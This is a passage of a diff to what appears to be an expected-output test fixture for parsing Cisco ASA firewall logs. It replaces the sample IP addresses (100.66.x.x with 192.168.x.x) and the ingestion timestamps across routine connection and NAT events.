TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095001973Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:32:20.604506500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095003703Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:32:20.604511800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095005519Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604517200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095007254Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:32:20.604522600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095008983Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:32:20.604528Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095010725Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:32:20.604533300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095012450Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:32:20.604538700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095014251Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:32:20.604544200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095016004Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604548100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095017764Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604552400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095019498Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:32:20.604557100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" @@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095021236Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:32:20.604561700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-07-19T09:06:25.095022972Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:32:20.604565200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", @@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095024721Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604569800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095026506Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604575300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095029561Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604580300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095031597Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:32:20.604583800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095033342Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604588Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095035101Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:32:20.604591500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095036934Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:32:20.604596200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095038656Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604601500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095040387Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:32:20.604605800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095042162Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:32:20.604611100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095043892Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:32:20.604616500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095045842Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604622100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095047610Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:32:20.604627500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095049324Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:32:20.604633100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095051043Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:32:20.604638500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": 